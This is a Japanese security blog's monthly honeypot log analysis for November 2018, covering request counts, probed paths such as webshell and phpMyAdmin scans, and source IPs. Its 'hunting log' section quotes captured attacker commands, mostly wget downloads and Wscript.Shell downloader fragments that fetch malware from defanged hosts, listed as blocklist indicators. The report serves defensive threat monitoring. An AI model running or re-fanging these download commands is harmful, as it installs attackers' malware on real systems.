S-Owl

S(ecurity)Owl

ハニーポットのログ分析まとめ(2018年11月度)

2018年11月度のWOWHoneypotのログ分析まとめです。
※先月分:ハニーポットのログ分析まとめ(2018年10月度) - S-Owl


<前提>
業務でプライベートSOCで監視を行っており、自組織を狙ったものか広く一般を狙ったものかを区別したく、広く一般を狙った通信を監視する為に業務と同じくhttpの通信をハニーポットで観測しています。

■スペック
台数:1台
ソフトウェア:WOWHoneypot
対象ポート:80/tcp
設置IP:日本のIP
ドメイン:取得済、未公開
運用:2018/6/5から開始

 

■日次のアクセス数
1ヶ月間の総アクセス数:14,797件 (前月:15,058件)

f:id:Sec-Owl:20190101184548p:plain

多少の波はありつつも、開始当初に比べれば多くなっています。
前月対比では微減ですが、前月はTomcat管理画面へのブルートフォースが1回に5,000件というものもあったため、それを考慮すると全体平均としては微増と考えても良いかもしれません。
アクセス数が多い日に偏りがない、土日でも多い日があることを考えると、人手の運用というよりは、自動的にスキャンしていると考えた方が良いかもしれません。

 

■アクセスパス
1ヶ月間のメソッド+パスの種類は808種類(前月:520種類)でした。
アクセスパスのtop20は以下です。

件数 種別 リクエス
971 アクセス GET /
274 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
259 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
167 phpのWebShell設置の調査 POST /qq.php
139 phpのWebShell設置の調査 POST /confg.php
138 phpのWebShell設置の調査 POST /1.php
119 Weblogic脆弱性(CVE-2018-3252)に対する調査行為 GET /bea_wls_deployment_internal
95 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
95 phpのWebShell設置の調査 GET /cmd.php
94 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
93 phpのWebShell設置の調査 POST /xx.php
93 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
93 phpのWebShell設置の調査 GET /shell.php
92 phpのWebShell設置の調査 POST /q.php
91 phpのWebShell設置の調査 POST /s.php
89 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
88 phpのWebShell設置の調査 POST /test.php
88 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
87 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
86 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php

同じような件数のアクセスで同じ種類のアクセスは1回のアクセスで連続して同一IPから来ているものであり、また、長期的に見ても同様ということは、恐らくは同じ攻撃者がアクセスしてきているものと思われます。
この攻撃者は定期的にアクセスするパスを追加しています。そのため、同種の攻撃ですが件数にややばらつきが生じています。

アクセスパスから攻撃種別を分類し、種別毎のアクセス数を算出したもののTop20は以下です。

件数 種別
8429 phpのWebShell設置の調査
3622 phpMyAdminの調査
976 アクセス
375 (不明)
322 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃
274 Tomcat管理ページへのブルートフォース攻撃
176 PHPWetherMapの調査
120 Weblogic脆弱性(CVE-2018-3252)に対する調査行為
85 WordPressの調査
54 WebDAVの調査
51 不正中継の調査
49 IIS脆弱性(CVE-2017-7269)を突く攻撃
42 クローリング
36 cfgファイルの調査
34 JBossに対する調査
30 オープンディレクトリの調査
12 Hadoop YARN ResourceManagerの脆弱性を突く攻撃
12 調査
11 FCKeditorの調査
10 Linux向けInternetGatwayの調査

phpのWebShell設置の調査とphpMyAdminの調査は同じIPからアクセスがあることが多く、同じ攻撃者が広く様々なものをスキャンしているものと思われます。それ以外にもPHPWetherMapの調査やWebDAVの調査も同一IPから来ていることがあります。

 

■ハンティングログ
主に任意のコード実行の脆弱性マルウェア本体を取得しに行くようなログをまとめたものです。
企業等ではブラックリストとして遮断して良いものですが、IPベースのものは変更される頻度が高いため、ドメインの方が役に立ちます。

件数 リクエス
41 wget -c hxxp://wap.tfddos[.]net:57843/linux
10 wget -c hxxp://154.85.99[.]85:33333/fafafafa3962
8 wget hxxp://209.141.33[.]119/avtechsh
7 wget -c hxxp://154.85.99[.]85:33333/whoaini
5 wget hxxp://103.45.109[.]111:5778/root1
5 wget -c hxxp://154.85.99[.]85:33333/fafa68fa
5 wget -c hxxp://154.85.99[.]85:280/whoainio
5 wget -c hxxp://154.85.99[.]85:280/tsnhnb
4 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
4 wget -c hxxp://aaa.linuxa[.]club:57843/linux
3 Wscript.Shell) >>C:/8.vbs&echo Post.Open GET,hxxp://a46.bulehero[.]in/download.exe
3 Wscript.Shell) >>C:/6.vbs&echo Post.Open GET,hxxp://cnm.idc3389[.]top/downloader.exe
3 Wscript.Shell) >>C:/12.vbs&echo Post.Open GET,hxxp://a46.bulehero[.]in/download.exe
3 wget hxxp://104.244.76[.]210/avtech
2 wget -c hxxp://203.234.179[.]234:81/1.exe
2 wget -c hxxp://154.85.99[.]85:33333/Linux4.7
1 wget hxxp://128.199.251[.]119/t.php
1 wget -c hxxp://66.79.179[.]213:808/11
1 wget -c hxxp://205.209.176[.]202:2018/admin1
1 wget -c hxxp://205.209.176[.]202:2018/888
1 wget -c hxxp://203.234.179[.]234:81/systems
1 wget -c hxxp://198.44.228[.]3:8080/11
1 wget -c hxxp://154.85.99[.]85:8080/TFGG123
1 wget -c hxxp://154.85.99[.]85:33333/fafafafa3968
1 wget -c hxxp://154.85.99[.]85:33333/9527zzz
1 wget -c hxxp://103.55.13[.]68:13333/sshk

ドメインでアクセスするものは主にStruts2脆弱性を突くものが多いです。特に一番件数が多いものは過去長期的に出ているものです。
それ以外のもの、主にIPでアクセスするものは主にIoTの脆弱性を狙ったものです。

 

ドメイン名でのアクセス
10月から取得しているドメイン名に対してのアクセスです。取得はしていますが、特段公開等はしていないものです。
ドメイン指定でアクセスしてくるものはWordPressの調査、攻撃がダントツで多いです。それ以外はサイト情報の調査がある程度でした。

件数 リクエス
105 GET /
73 POST /wp-login.php
40 GET /robots.txt
2 HEAD /
1 GET /wp/wp-admin/
1 GET /wp-admin/
1 GET /wordpress/wp-admin/
1 GET /sitemap.xml
1 GET /old/wp-admin/
1 GET /dev/wp-admin/
1 GET /demo/wp-admin/
1 GET /blog/wp-admin/
1 GET /backup/wp-admin/
1 GET /ads.txt

 

■送信元IP
送信元IPは1173件(前月:1049件)です。
アクセスがあったIPを地図にマッピングすると以下になります。

f:id:Sec-Owl:20190101190607p:plain

件数の多い上位のIPと件数は以下となります。

f:id:Sec-Owl:20190101190643p:plain

これらの内、上位に位置するものはアクセス数が同じ程度であり、これは主にphpのWebShell設置の調査とphpMyAdminの調査を行ってくる送信元になります。日々アクセスしてくるIPを変えながら、様々なスキャンを行っているものと考えられます。

 

以上です。